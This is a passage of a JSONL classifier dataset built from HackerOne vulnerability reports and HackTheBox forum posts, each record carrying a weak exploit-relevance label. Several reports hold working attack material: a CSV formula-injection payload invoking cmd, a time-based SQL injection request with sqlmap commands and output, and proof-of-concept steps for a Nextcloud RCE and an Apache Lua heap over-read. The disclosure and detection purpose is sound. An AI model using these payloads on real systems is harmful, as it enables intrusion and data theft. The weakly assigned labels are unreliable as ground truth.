Happy', ':D',\n'icon_e_biggrin.gif', '15', '17', '1', 'Very Happy', ':-D',\n'icon_e_biggrin.gif', '15', '17', '1', 'Very Happy', ':grin:',\n'icon_e_smile.gif', '15', '17', '1', 'Smile', ':)',\n'icon_e_smile.gif', '15', '17', '1', 'Smile', ':-)',\n'icon_e_smile.gif', '15', '17', '1', 'Smile', ':smile:',\n'icon_e_wink.gif', '15', '17', '1', 'Wink', ';)',\n'icon_e_wink.gif', '15', '17', '1', 'Wink', ';-)',\n'icon_e_wink.gif', '15', '17', '1', 'Wink', ':wink:',\n'icon_e_sad.gif', '15', '17', '1', 'Sad', ':(',\n'icon_e_sad.gif', '15', '17', '1', 'Sad', ':-(',\n'icon_e_sad.gif', '15', '17', '1', 'Sad', ':sad:',\n'icon_e_surprised.gif', '15', '17', '1', 'Surprised', ':o',\n'icon_e_surprised.gif', '15', '17', '1', 'Surprised', ':-o',\n'icon_e_surprised.gif', '15', '17', '1', 'Surprised', ':eek:',\n'icon_eek.gif', '15', '17', '1', 'Shocked', ':shock:',\n'icon_e_confused.gif', '15', '17', '1', 'Confused', ':?',\n'icon_e_confused.gif', '15', '17', '1', 'Confused', ':-?',\n'icon_e_confused.gif', '15', '17', '1', 'Confused', ':???:',\n'\"onmouseover=al", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-10-29", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "a403cd6ccd2228ba986d", "text": "[Improper Access Control - Generic] fs.statfs bypasses Permission Model\n\n**Summary:**\n\n`fs.statfs` is not limited by the permission model check\n\n**Description:**\n\n`fs.statfs` doesn't throw ERR_ACCESS_DENIED when accessing an restricted path, being able to get stat information of the file\n\n## Steps To Reproduce:\n\n```console\ntouch ./test.js\n```\n\n```js\n// index.js\nconst fs = require('fs')\n\nfs.statfs('./test.js', (err, stats) => {\n console.log('stats', stats)\n})\n```\n\n```\n$ node --experimental-permission --allow-fs-read=/path/to/index.js\n(node:756097) ExperimentalWarning: Permission is an experimental feature\n(Use `node --trace-warnings ...` to show where the warning was created)\nstats StatFs {\n type: 61267,\n bsize: 4096,\n blocks: 56377128,\n bfree: 27380986,\n bavail: 24498982,\n files: 14393344,\n ffree: 12478020\n}\n```\n\n## Impact\n\nEven though it can't read the file contents, it's still can perform I/O against that file to retrieve file stats and to check if a file exists.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-09-10", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0e1599f1edcff84cb02f", "text": "[Uncontrolled Resource Consumption] Specific Payload makes a Users Posts unavailable\n\nGood Morning, \n\nLike we talked about in the email, I'm reporting an issue that I've found that is possible, by crafting a specific payload, other users that try to access **/posts** of a user will face the **500 Internal Server Error** issue, not only when they access the specific crafted post. With this, the posts of the user will be blocked for other users. This could cause other problems like people possibly doing this on other's accounts and blocking all their posts for other users or it could be chained with some other vulnerability in the future.\n\nI found this issue when I was fuzzing with the markdown as I saw you guys were using **Links**, so trying some HTML encodings led me to the following payload: `[PoC](￾())`.\n - `￾` decoded will endup a [invalid character](https://charbase.com/fffe-unicode-invalid-character)\n - `)` decoded will endup a `)`. \n\nWith this, we can see that the markdown doesn't take our encoding very well which then causes a 500 Internal Server Error and blocks the **Posts** of any user to other users.\n\nProof that the **Fetlife Security Team** gave me the **go-ahead** to report this issue. \n\n{F1280132}\n\nSteps to Reproduce\n=====================\n\n1. Go to **Write Post**\n2. On the **Body** insert the following payload `[PoC](￾())`\n\n{F1280189}\n\n3. Click on **Express Yourself**\n4. We are now faced with the **500 Internal Server Error** and if we try to access https://fetlife.com/users/OUR_USER_ID/posts, we can see that our posts are completely blocked for us and everyone and that we're still faced with a **500 Internal Server Error**.\n\nFinal\n=====================\nThank you for your time, best regards, Rafael Castilho\n\n## Impact\n\nThis could cause other problems like people possibly doing this on other's accounts and blocking all their posts for other users or it could be chained with some other vulnerability in the future.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-26", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "607951e3caa412aea42e", "text": "I got to the point where I can read and need to pwn leak . I can call handler and get Bye back. I also understand that there are not enough rop gadgets to call system. I tried ret2csu , but as I understand there are also not enough gadgets for this. I’m trying to ret2dl , w/ pwntools. But it says that it can’t find any instructions for syscall. Given the progression of the challenge, it feels like I’m chasing a rabbithole and it should be simpler than that. Can anyone give a hint?", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-07-28", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "135b6a569cca13a9af81", "text": "[Code Injection] Desktop client can be tricked into opening/executing local files when clicking a nc://open/ link\n\nhttps://github.com/nextcloud/desktop/pull/4771 added support for \"local edit\", this feature is however implemented in an insecure way.\n\n[The code](https://github.com/nextcloud/desktop/blob/ee98244877e8ccaaa8487f2487c31ce112b746c5/src/gui/folderman.cpp#L1476-L1480) is calling into `QDesktopServices::openUrl(QUrl::fromLocalFile(foundFiles.first()));` and `foundFiled.first()` will be the path of the file specified via the deeplink:\n\n```cpp\n // In case the VFS mode is enabled and a file is not yet hydrated, we must call QDesktopServices::openUrl from a separate thread, or, there will be a freeze.\n // To avoid searching for a specific folder and checking if the VFS is enabled - we just always call it from a separate thread.\n QtConcurrent::run([foundFiles] {\n QDesktopServices::openUrl(QUrl::fromLocalFile(foundFiles.first()));\n });\n```\n\n`QDesktopServices::openUrl` is however not suited for not trusted user input as it will also execute files directly.\n\n## Proof of concept\n\nThe following proof of concept was performed under Windows 10:\n\n1. In the web interface create a `test.vbs` file such as `MsgBox \"Hallo\", VBOKOnly, \"Ok\"`.\n2. Open `nc://open/mSnmByRJcj6cwKwX@demo1.nextcloud.com/test.vbs` in the browser (adjust username and instance path)\n3. The VB Script will be executed and a popup will appear.\n\n**Note:** This can also be exploited by a remote attacker if they upload a file to the same instance a user has access to.\n\n## Recommendations\n\nThere are several mitigation recommendations here:\n\n- Add a CSRF token to the `nc://open/` link and have the client verify the token on request.\n- Ensure only safe file types can be opened using a local file viewer. \n\n## Disclosure Policy\nPlease note that all bugs reported by [Authentick GmbH](https://www.authentick.net) will be publicly disclosed within 90 days of vendor notification. In extraordinary cases we may increase that upon request by the vendor.\n\n## Impact\n\nThe Nextcloud Desktop Client in version 3.6.0 is vulnerable to a Remote Code Execution that can be exploited by anyone that is able to upload files to an instance the user has access to. **In many cases this will be everyone due to public chats, files drop upload, etc.**\n\nExploitation just requires the victim to visit a malicious web page (or click a link on an email or anything like that)", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-02-10", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0a2a71ccc2f150c43da7", "text": "I don’t know if this is still relevant, but you should think where you could else use the found credentials.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-08-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ce37f66dad384b2bdb58", "text": "[Cross-site Scripting (XSS) - Stored] Blind XSS via Feedback form.\n\n## Summary:\n\nHi Team,\n\n I found Blind XSS which is triggered on the admin panel. I was trying to add widgets on the installation page for default theme. When the installation was done, I saw a question like that Are you happy with how everything looks?. I clicked the No, please remove all widgets button and then the feedback form arrives. I submitted my blind XSS payload. It triggered in 20-30 minutes on https://judge.me/admin which requires the HTTP Basic Authentication. I can't get the admin session cookie but I can collect all of the admin pages.\n\n## Steps To Reproduce:\n\n 1. Go to https://odo-tester.myshopify.com/admin/ and login with the test credentials.** (credentials in the Credentials Header)**\n 1. Click the **Apps** tab from the left side and then click **Judge.me Product Reviews**.\n 1. Click** Add Widgets** then **Start Installation** and continue.\n 1. When the installation is done. It asks **Are you happy with how everything looks?**. Choose **No, please remove all widgets button**. Feedback form appears and put your blind xss payload.\n 1. Wait for payload triggering.\n\n## Supporting Material/References:\n\nVulnerable Page URL : https://judge.me/admin/██████���█\nReferer: https://judge.me/admin/███\n\nCookies:```http\n██████████████ ```\n\n\n## Credentials\n\n```http\nemail: ██████████@yopmail.com\npassword: ███████\ntempmail: https://yopmail.com/?judgeme-███████████ ( it can be necessary when you are login )\npayload: \">\n```\n\n Admin Page\n=====================\n█████\nVulnerable Page\n=====================\n███████ \nSteps to Reproduce Video\n=====================\n████\n\n## Impact\n\nBlind XSS leads to access the admin panel. It may contain information leaks about other shop owners' reports. Executes javascript code on admin panel. Stealing admin cookies.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-03", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "a94d1e88921f3a4e87cb", "text": "[Command Injection - Generic] CSV Injection at https://assets-paris-demo.codefi.network/\n\n## Summary:\nHi consensys Security Team.\n\nI have found CSV Injection when generate report at https://assets-paris-demo.codefi.network/\n\nCSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files.\nWhen a spreadsheet program such as Microsoft Excel or LibreOffice Calc is used to open a CSV, any cells starting with = will be interpreted by the software as a formula. Maliciously crafted formulas can be used for three key attacks:\n\n - Hijacking the user’s computer by exploiting vulnerabilities in the spreadsheet software, such as CVE-2014-3524.\n - Hijacking the user’s computer by exploiting the user’s tendency to ignore security warnings in spreadsheets that they downloaded from their own website.\n - Exfiltrating contents from the spreadsheet, or other open spreadsheets.\n\n\n## Steps To Reproduce:\n1. Create an account at https://assets-paris-demo.codefi.network/ \n2. Go to Client management\n3. Create new client \n4. At Client name* Put this paylaod:- `=cmd|' /C notepad'!'A1'`\n5. After create new client Download the data.\n\n## Supporting Material/References:\n\n{F2002581}\n\n##Similar valid reports at hackerone:-\n - https://hackerone.com/reports/118582\n - https://hackerone.com/reports/223344\n - https://hackerone.com/reports/386116\n\nPlease let me know if need more info.\nBest Regards.\n@doosec101\n\n## Impact\n\nThis vulnerability can be harm for normal user because if malicious user injected any malicious script in token note and when customer user download CSV file then inserted command directly runs when CSV file open.\n\n##FIX:-\n Prefix =, +, - and @ symbols with a ' in issues when exporting them to a .csv file.", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2014-3524"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-01-04", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ec2d6aaa758268195cca", "text": "[SQL Injection] Time Based SQL Injection\n\nHello and greetings and respect to you, dear friends\nWe all know that the sql injection bug is very dangerous, so this bug should be eliminated as soon as possible.\nI've identified an SQL injection vulnerability of type Time Based on https://diplomaticrooms.state.gov this site use wordpress cms but its not plugin sql injection \nBelow, we see how we found this vulnerability \nIf you look carefully, we see that search in the website name Search results The gap has occurred there\nas you can see POST Method [POST https://diplomaticrooms.state.gov/?s=porcelain,%20gilt ]\nnow it's time to inject or generate POC with lovely tool sqlmap \nWe used a text file here by Name request.txt\nand this is our command in sqlmap you can use this command for your own confidence\n\npython3 sqlmap.py -r request --batch --random-agent --tamper=space2comment --level=5 --risk=3 --drop-set-cookie --threads 10 --dbs\n===========================================================================================\nPOST https://diplomaticrooms.state.gov/?s=porcelain,%20gilt HTTP/1.1\nHost: diplomaticrooms.state.gov\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0\nPragma: no-cache\nCache-Control: no-cache\nContent-Type: application/x-www-form-urlencoded\nReferer: https://diplomaticrooms.state.gov/?s=porcelain,%20gilt\nContent-Length: 133\nCookie: AWSALB=Bcs9ZrXwIhoRbHdfPbZAnVhkYJt9OJslAaUUgh5cOw9FMhg/43C2umhc4fQe7PtAorAHMSdr2dNw0asilWMYXjaFigXJhQJ2lxs05WQbpeI/cYRSGXLyo4E+hiQ1; AWSALBCORS=Bcs9ZrXwIhoRbHdfPbZAnVhkYJt9OJslAaUUgh5cOw9FMhg/43C2umhc4fQe7PtAorAHMSdr2dNw0asilWMYXjaFigXJhQJ2lxs05WQbpeI/cYRSGXLyo4E+hiQ1\nConnection: Close\nsearch=porcelain%2C+gilt%27+AND+%28SELECT+*+FROM+%28SELECT%28SLEEP%285%29%29%29Xeps%29+AND+%27HlBp%27%3D%27HlBp&post_types%5B%5D=post\n======================================================================================\n python3 sqlmap.py -r request --batch --random-agent --tamper=space2comment --level=5 --risk=3 --drop-set-cookie --threads 10 --dbs\n ___\n __H__\n ___ ___[\"]_____ ___ ___ {1.7.1.5#dev}\n|_ -| . [\"] | .'| . |\n|___|_ [']_|_|_|__,| _|\n |_|V... |_| https://sqlmap.org\n\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n[*] starting @ 12:21:06 /2023-02-17/\n\n[12:21:06] [INFO] parsing HTTP request from 'request'\n[12:21:06] [INFO] loading tamper module 'space2comment'\n[12:21:06] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9b5) Gecko/2008041514 Firefox/3.0b5' from file '/home/ubuntu/sqlmap/data/txt/user-agents.txt'\ncustom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y\n[12:21:06] [INFO] resuming back-end DBMS 'mysql'\n[12:21:06] [INFO] testing connection to the target URL\nsqlmap resumed the following injection point(s) from stored session:\n---\nParameter: #1* ((custom) POST)\n Type: boolean-based blind\n Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)\n Payload: search=porcelain, gilt' AND (SELECT -9789) OR 6323=6323# FROM (SELECT(SLEEP(5)))Xeps) AND 'HlBp'='HlBp&post_types[]=post\n---\n[12:21:07] [WARNING] changes made by tampering scripts are not included in shown payload content(s)\n[12:21:07] [INFO] the back-end DBMS is MySQL\nweb application technology: Apache, PHP 7.4.16\nback-end DBMS: MySQL 5 (MariaDB fork)\n[12:21:07] [INFO] fetching database names\n[12:21:07] [INFO] fetching number of databases\n[12:21:14] [WARNING] reflective value(s) found and filtering out\n[12:21:14] [INFO] resumed: 6\n[12:21:14] [INFO] retrieving the length of query output\n[12:21:14] [INFO] retrieved: 18\n[12:22:32] [INFO] retrieved: information_schema\n[12:22:32] [INFO] retrieving the length of query output\n[12:22:32] [INFO] retrieved: 5\n[12:23:01] [INFO] retrieved: mysql\n[12:23:01] [INFO] retrievin", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-04-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "dd311b22590e8c429cd8", "text": "[Cross-site Scripting (XSS) - Stored] XSS via Mod Log Removed Posts\n\n## Summary:\nI have discovered an XSS vulnerability regarding the mod notes feature. Specifically, the XSS payload executes when the victim removes a post in a subreddit and opens up the mod notes of the attacker.\n\n## Steps To Reproduce:\n\n1. The attacker creates a new post with the title containing the XSS payload.\n2. The victim (mods of the subreddit) then must remove your post.\n3. The payload executes when a victim (subreddit mod) opens up your mod notes. Sometimes, the mod notes are displayed when the victim hovers on your profile (this is true when a recent mod action has been taken on the user). \n\n## Supporting Material/References:\n\n█████\n█████\n\n## Impact\n\nImpact Below:", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-03-10", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "83555e66332a29f99b12", "text": "[Open Redirect] Open Redirect Vulnerability in Action Pack\n\nWe were able to bypass the mechanism that prevents open redirects due to incomplete URL input validation.\nI have reported it below and written a patch to fix it.\nhttps://hackerone.com/reports/1789458\n\n## Impact\n\nVulnerable code will look like this:\n\n```ruby\nredirect_to(params[:some_param])\n```\n\nRails 7.0 introduced protection against open redirects from calling redirect_to with untrusted user input. In prior versions the developer was fully responsible for only providing trusted input. However the check introduced could be bypassed by a carefully crafted URL.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-03-26", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "1908e08139ffc70940e9", "text": "[Incorrect Authorization] oauth misconfigration lead to account takeover\n\n## Summary:\nmisconfigration in aouth 2.0 login with google account in \"accounts.reddit.com\"\n\n## Impact:\nmisconfigration leads to account takeover\n\n## Steps To Reproduce:\n\n 1. go to \"https://accounts.reddit.com/\".\n 2. and login with your google account.\n 3. after login, logout from your account.\n 4. after logout go to \"https://accounts.reddit.com/account/register/\" and register with email you signed in before in google account oauth.\n 5. as like you see it's created a new account \n\n\n * [attachment / reference]\n\n## Impact\n\nattacker can login with any user's email thats lead to account takeover", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "04f2b2cf356134d5983c", "text": "[Code Injection] HTML injection in email at https://www.hackerone.com/\n\n**Summary:**\nBy filling the firstname and last name with html tags at this form \nhttps://www.hackerone.com/hackers/pentest-community-application\n\nIt is possible to send email via hackerone and add custom html :)\n\n\n**Description:**\n\n### Steps To Reproduce\n\n1. visit https://www.hackerone.com/hackers/pentest-community-application\n2. in first name and last name add html tags ie firstname \">

anything etc. \n3. in email section add email of victim . \n4. submit the form \n5. check the email and see the html injected there \n\n### additional information: \n1.) please check the screenshot to see both the emails ie 1 without payload and one with payload \n\n\n### Optional: Your Environment (Browser version, Device, etc)\n\n * \n\n### Optional: Supporting Material/References (Screenshots)\n\n *\n\n## Impact\n\nAn attacker can send malicious emails from hackerone , inject html in the email :) \nwe all know where it leads to .", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "31e65eb23dfa782aa3ee", "text": "try out this command it’ll work $ netstat -ln4 | grep LISTEN | grep -v 127 | wc -l", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-02-10", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "7b7295caea148bb52d0c", "text": "[Information Disclosure] Controllable read beyond bounds in lua_websocket_readbytes() [zhbug_httpd_126]\n\nGreetings. I have found a read-beyond-bounds bug in lua_websocket_readbytes() that permits an attacker to exfiltrate a controllable amount of heap data if the victim site runs a suitable LUA program.\n\nThe bug is due to misuse of ap_get_brigade() and apr_bucket_read(). The following code (from v2.4.53) assumes that ap_get_brigade(...readBytes) and ap_bucket_read(...len,...) return |readBytes| or |len| bytes on success return when used in AP_MODE_READBYTES/APR_BLOCK_READ mode, respectively. This idea is false, and causes line 2242, below, to return the address of a buffer |data| that is likely to be shorter than |len|. Line 2244 then copies |len| bytes of |data|, including some number of beyond-bounds bytes, into |buffer|. A suitable LUA program can then be abused to return this |buffer| to an attacker.\n\nThe bug is still present in trunk.\n```\n 2230: static apr_status_t lua_websocket_readbytes(conn_rec* c, char* buffer,\n 2231: apr_off_t len)\n 2232: {\n 2233: apr_bucket_brigade *brigade = apr_brigade_create(c->pool, c->bucket_alloc);\n 2234: apr_status_t rv;\n 2235: rv = ap_get_brigade(c->input_filters, brigade, AP_MODE_READBYTES,\n 2236: APR_BLOCK_READ, len);\n 2237: if (rv == APR_SUCCESS) {\n 2238: if (!APR_BRIGADE_EMPTY(brigade)) {\n 2239: apr_bucket* bucket = APR_BRIGADE_FIRST(brigade);\n 2240: const char* data = NULL;\n 2241: apr_size_t data_length = 0;\n 2242: rv = apr_bucket_read(bucket, &data, &data_length, APR_BLOCK_READ);\n 2243: if (rv == APR_SUCCESS) {\n 2244: memcpy(buffer, data, len);\n 2245: }\n 2246: apr_bucket_delete(bucket);\n 2247: }\n 2248: }\n 2249: apr_brigade_cleanup(brigade);\n 2250: return rv;\n 2251: }\n```\nAttached is a POC that demonstrates the bug. It creates a TLS connection to httpd, asks to upgrade the connection to websocket, then sends a websocket frame that purports to transfer `0x4000` bytes of payload to `/bug126/bug126.lua` on httpd. However, the frame does not actually include any payload. The LUA program simply does a websocket upgrade, then reads and echoes whatever data it obtains. Because of the bug, what it obtains (and echoes to the POC program) is `0x4000` bytes of beyond-bounds heap.\n\nUse the POC thusly:\n\n 1. Enable LUA on an httpd server.\n 2. Copy bug126.lua to bug126/bug126.lua on the httpd server.\n 3. Edit |SERVER_NAME| in httpd_wsclient.cpp to contain the DNS name/IP address of the server.\n 4. Edit the certificate file path on httpd_wsclient.cpp line 130 to something appropriate for the certs your httpd server uses.\n 5. Edit the \"host\" header line on httpd_wsclient.cpp line 153 appropriately for your httpd server.\n 6. Build httpd_wsclient.cpp against OpenSSL 1.1.x.\n 7. Attach a debugger to httpd and set a BP on line 2233, above.\n 8. Start httpd_wsclient and set a BP on line 179, on the |while (len > 0)| statement.\n 9. Continue execution of httpd_wsclient.\n 10. You will get several BPs on line 2233. Wait for the one with |len| == 0x4000.\n 11. Now step through line 2235 and notice that it returns success.\n 12. Step through line 2239 (success) and 2242 (success, |data_length| == 1...oh-oh!).\n 13. Now step the memcpy() and watch it copy 0x4000-1 bytes of beyond-bounds heap into |buffer|.\n 14. Let httpd proceed.\n 15. Now you'll get a BP in httpd_wsclient. Check |len|, which probably will be 0x2000. Look at that many bytes off |recvBuf| and verify that they're data from httpd's heap.\n 16. Step the |do| loop again to get another ~0x2000 bytes of httpd heap data.\n```\n-------- bug126.lua ----------------------------------------------------\nfunction handle(r)\n if r:wsupgrade() then\n local data, isFinal = r:wsread();\n r:wswrite(data);\n end\nend\n-------- bug126.lua ----------------------------------------------------\n```\n```\n-------- httpd_wsclient.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-07-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "49d24b5c28bf8e4e3cd4", "text": "Just solved this. To anyone stuck at this place. The only hint I think I would give in public is to notice that your reverse shell isn’t fully interactive. It is possible and necessary to have a fully interactive tty shell.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-01-02", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "f41d771b6183d96a1d9a", "text": "[Server-Side Request Forgery (SSRF)] Server-side request forgery (ssrf)\n\n*.yelp-support.com\n\n## Summary:\n\nServer-side request forgery \n \n## Platform(s) Affected:\n\nwww.yelp-support.com\n\n## Steps To Reproduce:\n \n1. If you visit this site, attackers could try to steal information like your passwords, emails, or credit card details.\n\n2. your server has redirect to malicious website \n\n3. i am Referer: https://evil.com/ and your don't check server properly the write website \n\n#Steps\n\n 1 . i am open assetfinder to subdomain enumeration on this domain : yelp-support.com\n\n2. i am open in this subdomain in Burp suite : www.yelp-support.com\n \n3. my Browser Request: \n\nGET /static/111213/js/perf/stub.js HTTP/1.1\nHost: www.yelp-support.com\nCookie: CookieConsentPolicy=0:1; LSKey-c$CookieConsentPolicy=0:1\nSec-Ch-Ua: \"Chromium\";v=\"105\", \"Not)A;Brand\";v=\"8\"\nSec-Ch-Ua-Mobile: ?0\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36\nSec-Ch-Ua-Platform: \"Linux\"\nAccept: */*\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: no-cors\nSec-Fetch-Dest: script\n#Referer: https://evil.com/ --------- i am change this link ------ \nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\nConnection: close\n\n4. and your server Response:\n\n\nHTTP/1.1 200 OK\nDate: Mon, 26 Sep 2022 08:14:39 GMT\nContent-Type: application/x-javascript\nConnection: close\nStrict-Transport-Security: max-age=63072000; includeSubDomains\nCache-Control: public,max-age=10368000\nExpires: Tue, 24 Jan 2023 08:14:39 GMT\nLast-Modified: Thu, 18 Dec 2014 19:28:42 GMT\nVary: Accept-Encoding\nServer: sfdcedge\nX-SFDC-Request-Id: 78779c5a3d8ac507638c3b6c783c3ce8\nContent-Length: 1385\n\nthis[\"Perf\"]&&void 0!==this[\"Perf\"].enabled||(function(window){'use strict';var a={DEBUG:{name:\"DEBUG\",value:1},INTERNAL:{name:\"INTERNAL\",value:2},PRODUCTION:{name:\"PRODUCTION\",value:3},DISABLED:{name:\"DISABLED\",value:4}};\nwindow.PerfConstants={PAGE_START_MARK:\"PageStart\",PERF_PAYLOAD_PARAM:\"bulkPerf\",MARK_NAME:\"mark\",MEASURE_NAME:\"measure\",MARK_START_TIME:\"st\",MARK_LAST_TIME:\"lt\",PAGE_NAME:\"pn\",ELAPSED_TIME:\"et\",REFERENCE_TIME:\"rt\",Perf_LOAD_DONE:\"loadDone\",STATS:{NAME:\"stat\",SERVER_ELAPSED:\"internal_serverelapsed\",DB_TOTAL_TIME:\"internal_serverdbtotaltime\",DB_CALLS:\"internal_serverdbcalls\",DB_FETCHES:\"internal_serverdbfetches\"}};window.PerfLogLevel=a;var b=window.Perf={currentLogLevel:a.DISABLED,mark:function(){return b},endMark:function(){return b},updateMarkName:function(){return b},measureToJson:function(){return\"\"},toJson:function(){return\"\"},setTimer:function(){return b},setServerTime:function(){return b},toPostVar:function(){return\"\"},getMeasures:function(){return[]},getBeaconData:function(){return null},setBeaconData:function(){},clearBeaconData:function(){},removeStats:function(){},stat:function(){return b},getStat:function(){return-1},\nonLoad:function(){},startTransaction:function(){return b},endTransaction:function(){return b},updateTransaction:function(){return b},isOnLoadFired:function(){return!1},util:{setCookie:function(){}},enabled:!1};})(this);\n\n \n5. successfully redirect to your server \n\n\n\n## Supporting Material/References: \n\n1. assetfinder\n\n2. Burp suite\n\n## Impact\n\n1. If you visit this site, attackers could try to steal information like your passwords, emails, or credit card details.\n\n2. your server has redirect to malicious website \n\n3. i am continue to visit this so your server will crash \n\n4. your website access to malicious website", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-28", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "a397bdea645308ae2808", "text": "[Improper Access Control - Generic] New AppPassword can be generated without password confirmation\n\nThere is protection on https://github.com/nextcloud/server/blob/master/apps/settings/lib/Controller/AuthSettingsController.php#L122 that you must have recently entered your password to be able to generate a new AppPassword. However if an attacker would obtain access to your system (say you forgot to lock it when taking a quick bathroom break).\n\nThey can abuse a route to just obtain this. ```https://SERVER/ocs/v2.php/core/getapppassword```\nProbably without you ever noticing.\n\n## Impact\n\nThe password confirmation to generate an app password is effectively useless as it is trivial to bypass.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-08-10", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "34b80070fb5e9ad0dd73", "text": "[Unknown] [Python]: CWE-079: HTTP Header injection\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ca8e7e01f5d92f4b156b", "text": "Hi MunAsqah, I have spent a week on this. could you please help me with the last question about DNS lab. thanks", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-02-23", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "22d3e709504dd81ff4a7", "text": "[Unknown] Electron CVE-2022-35954 Delimiter Injection Vulnerability in exportVariable\n\n## Describe the summary:\nThe Electron Website provides a set of packages to make creating actions easier. The `core.exportVariable` function uses a well known delimiter that attackers can use to break out of that specific variable and assign values to other arbitrary variables. Workflows that write untrusted values to the `GITHUB_ENV` file may cause the path or other environment variables to be modified without the intention of the workflow or action author. Users should upgrade to `@actions/core v1.9.1`. If you are unable to upgrade the `@actions/core` package, you can modify your action to ensure that any user input does not contain the delimiter `_GitHubActionsFileCommandDelimeter_` before calling `core.exportVariable`.\n\n## Impact\n\n[CVE-2022-35954](https://afaghhosting.net/blog/cve-2022-35954/)\nCWE-74\nCWE-77\nCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": ["CVE-2022-35954"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-12-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "a902b359c85303d88dda", "text": "[Information Disclosure] Sensitive data exposure via /secure/QueryComponent!Default.jspa endpoint on ████████\n\n**Description:**\n\nHi,\nWhile going through the testing of DoD assets, I have came across a subdomain that is vulnerable to CVE-2020-14179. Some of the internal fields that are exposed are Project, Status, Limits, Creator, Query, Created Date, Updated Date, Resolution Date, etc. \n\n## References\n\nhttps://jira.atlassian.com/browse/JRASERVER-71536\nhttps://www.cvedetails.com/cve/CVE-2020-14179\n\n## Impact\n\nIt allows unauthenticated attackers like me to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint.\n\n## System Host(s)\n███\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2020-14179\n\n## Steps to 